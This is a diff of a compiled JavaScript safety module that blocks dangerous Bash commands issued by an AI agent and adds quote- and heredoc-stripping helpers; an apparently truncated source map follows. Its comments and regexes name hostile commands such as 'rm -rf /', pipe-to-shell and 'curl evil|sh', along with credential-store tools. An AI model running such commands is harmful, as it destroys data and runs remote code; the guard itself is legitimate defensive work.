+ * Replace the contents of single-quoted strings and heredoc bodies in
+ * a Bash command with empty placeholders. Used by the Bash classifier
+ * (and the Claude PreToolUse hooks in `claude-tool-collection.ts`) so
+ * regex rules that scan for command-shaped tokens (`sudo`, `security`,
+ * `rm -rf`, `eval`, `curl|sh`, …) do not misfire on text that
+ * legitimately appears as a JSON body, header value, or heredoc
+ * payload of an otherwise benign command.
+ *
+ * Example:
+ *   `curl -d '{"content":"run sudo for the cron job"}' …`
+ *   → after stripping → `curl -d '' …`
+ *   → the `sudo` regex no longer matches.
+ *
+ * **Scope — single quotes and heredocs only.** Bash treats these as
+ * literal data: nothing inside `'…'` or a heredoc body is ever evaluated
+ * as a command, so erasing the content cannot hide a real attack.
+ * Double-quoted strings ARE NOT stripped — they allow `$(…)` command
+ * substitution and `${…}` parameter expansion, which means a payload
+ * like `python -c "$(curl evil|sh)"` is genuinely a sub-command, and
+ * the absolute-block / curl-flag regexes need to see it. Back-ticks are
+ * NOT stripped for the same reason (`` `…` `` is command substitution).
+ *
+ * Heredoc bodies are stripped because they reach the program as stdin
+ * data, never as command-line arguments — a body line like `rm -rf /`
+ * inside `<<'EOF'` is content the daemon's API parses as JSON, not a
+ * shell command bash will execute.
+ *
+ * Limitations:
+ *   - Backslash-escaped single quotes inside `'…'` are not a thing in
+ *     POSIX shell (single quotes do not honour escapes), so no special
+ *     handling is needed there. The agent's documented body-submission
+ *     pattern (`_safety.md` "Daemon-API body submission") consistently
+ *     uses single quotes around JSON bodies, so this scope covers the
+ *     production case.
+ *   - Operators who write `-H "Content-Type: application/json"` (double
+ *     quotes around a header value) trade off precision: the flag-scan
+ *     regexes can still false-positive on text inside double quotes.
+ *     The skills + _safety.md document the single-quote form, so this
+ *     is a documented best-practice, not a hidden footgun.
+ *
+ * Exported so the same scan can be reused by the Claude PreToolUse
+ * hooks; the helper lives next to `classifyAbsoluteBlock` because both
+ * consumers share the same trust model (regex-match a Bash command
+ * outside of literal single-quote / heredoc content).
+ */
+/**
+ * Heredoc-only sibling of `stripBashStringContent`. Erases heredoc bodies
+ * (which reach the program as stdin payload, never as shell argv) while
+ * preserving quoted string content intact.
+ *
+ * Use this when a downstream analysis needs to **tokenize** the command
+ * and read literal quoted argument values — the URL extractor in the
+ * Claude curl hook recognises `curl 'http://localhost:8321/...'` as a
+ * target URL by looking inside the single-quoted token, so it cannot
+ * use the broader `stripBashStringContent` (which collapses every
+ * single-quoted string to `''`).
+ *
+ * Substring-pattern scans that only test for flag presence (and never
+ * need to read a flag's value) should keep using `stripBashStringContent`
+ * — it gives the strongest false-positive immunity for prose inside
+ * quoted bodies.
+ */
+export function stripBashHeredocs(cmd) {
+    // Identify every `<<DELIM` / `<<'DELIM'` / `<<"DELIM"` declaration in
+    // the ORIGINAL command, then erase each body up to the line that
+    // contains only the matching delimiter. The `<<-` form allows leading
+    // whitespace on the closing delimiter line and is honoured.
+    const heredocs = [];
+    const declRe = /<<-?\s*(?:'([^']+)'|"([^"]+)"|(\w+))/g;
+    let dm;
+    while ((dm = declRe.exec(cmd)) !== null) {
+        const delim = dm[1] ?? dm[2] ?? dm[3] ?? "";
+        if (delim)
+            heredocs.push({ delim, allowIndent: dm[0].startsWith("<<-") });
+    }
+    let stripped = cmd;
+    for (const { delim, allowIndent } of heredocs) {
+        const escDelim = delim.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+        const bodyRe = new RegExp(`\\n[\\s\\S]*?\\n${allowIndent ? "[\\t ]*" : ""}${escDelim}(?=\\n|$)`);
+        stripped = stripped.replace(bodyRe, "\n");
+    }
+    return stripped;
+}
+export function stripBashStringContent(cmd) {
+    // Phase 1 — heredocs (delegated; see `stripBashHeredocs` JSDoc).
+    // Phase 2 — single-quoted strings only. Double quotes and back-ticks
+    // are intentionally left in place (see the JSDoc above on why).
+    return stripBashHeredocs(cmd).replace(/'[^']*'/g, "''");
+}
 export function classifyAbsoluteBlock(toolName, rawArg) {
     if (!rawArg)
         return null;
     const arg = rawArg.trim();
     if (toolName === "Bash") {
+        // Run every pattern check against the quote/heredoc-stripped form
+        // so command-shaped text inside JSON bodies / header values /
+        // heredoc payloads cannot trip the classifier. The raw `arg` is
+        // still preserved for `firstToken(arg)` so audit rows record the
+        // actual leading executable the agent attempted to invoke.
+        const scan = stripBashStringContent(arg);
         // Recursive delete — runs as an independent PreToolUse `block` hook
         // (claude-code-core.ts:1873-1884) on top of the SDK `disallowedTools`
         // glob layer, so this regex MAY be broader than the static SDK list:
@@ -229,11 +325,11 @@ export function classifyAbsoluteBlock(toolName, rawArg) {
         // happens to contain `rm` mid-stream — e.g. `echo rm --recursive`
         // or `grep "rm -rf" file`.
         const cmdStart = "(?:^|[;&|`(\\n]\\s*)";
-        if (new RegExp(`${cmdStart}rm\\s+(?:-[a-zA-Z]*[rR][a-zA-Z]*|--recursive)\\b`).test(arg)
-            || new RegExp(`${cmdStart}rm\\b[^|&;\`\\n]*?\\s--recursive\\b`).test(arg)) {
+        if (new RegExp(`${cmdStart}rm\\s+(?:-[a-zA-Z]*[rR][a-zA-Z]*|--recursive)\\b`).test(scan)
+            || new RegExp(`${cmdStart}rm\\b[^|&;\`\\n]*?\\s--recursive\\b`).test(scan)) {
             return { category: "recursive_delete", redacted: firstToken(arg) };
         }
-        if (/(^|\s)(sudo|doas|su)(\s|$)/.test(arg)) {
+        if (/(^|\s)(sudo|doas|su)(\s|$)/.test(scan)) {
             return { category: "privilege_escalation", redacted: firstToken(arg) };
         }
         // Pipe-to-shell and indirect-eval RCE.
@@ -272,15 +368,15 @@ export function classifyAbsoluteBlock(toolName, rawArg) {
         // existing `cmdStart` anchor used by the `rm` rule (declared above), so
         // `eval`/`source` only triggers when invoked as a command at start-of-line
         // or after a shell separator.
-        if (/\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash)\b/.test(arg)
-            || /\b(?:bash|sh)\s*<\(/.test(arg)
-            || /<\(\s*(?:curl|wget)\b/.test(arg)
-            || new RegExp(`${cmdStart}(?:eval|source)\\b\\s+\\S`).test(arg)
-            || /(?:^|[\s;&|`])\.\s+<\(\s*(?:curl|wget)\b/.test(arg)
-            || /\b(?:python|python3|node|deno|perl|ruby|php)\b[^|]*?(?:-c|-e|--eval|--exec)\b[^|]*?\$\([^)]*?\b(?:curl|wget)\b/.test(arg)) {
+        if (/\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash)\b/.test(scan)
+            || /\b(?:bash|sh)\s*<\(/.test(scan)
+            || /<\(\s*(?:curl|wget)\b/.test(scan)
+            || new RegExp(`${cmdStart}(?:eval|source)\\b\\s+\\S`).test(scan)
+            || /(?:^|[\s;&|`])\.\s+<\(\s*(?:curl|wget)\b/.test(scan)
+            || /\b(?:python|python3|node|deno|perl|ruby|php)\b[^|]*?(?:-c|-e|--eval|--exec)\b[^|]*?\$\([^)]*?\b(?:curl|wget)\b/.test(scan)) {
             return { category: "pipe_to_shell", redacted: firstToken(arg) };
         }
-        if (/(^|\s)(security|secret-tool|cmdkey)\b/.test(arg)) {
+        if (/(^|\s)(security|secret-tool|cmdkey)\b/.test(scan)) {
             return { category: "secret_cli", redacted: firstToken(arg) };
         }
         return null;

package/dist/safety/always-disallowed.js.map

@@ -1 +1 @@
-{"version":3,"file":"always-disallowed.js","sourceRoot":"","sources":["../../src/safety/always-disallowed.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"always-disallowed.js","sourceRoot":"","sources":["../../src/safety/always-disallowed.ts"],"names":[],"mappings":"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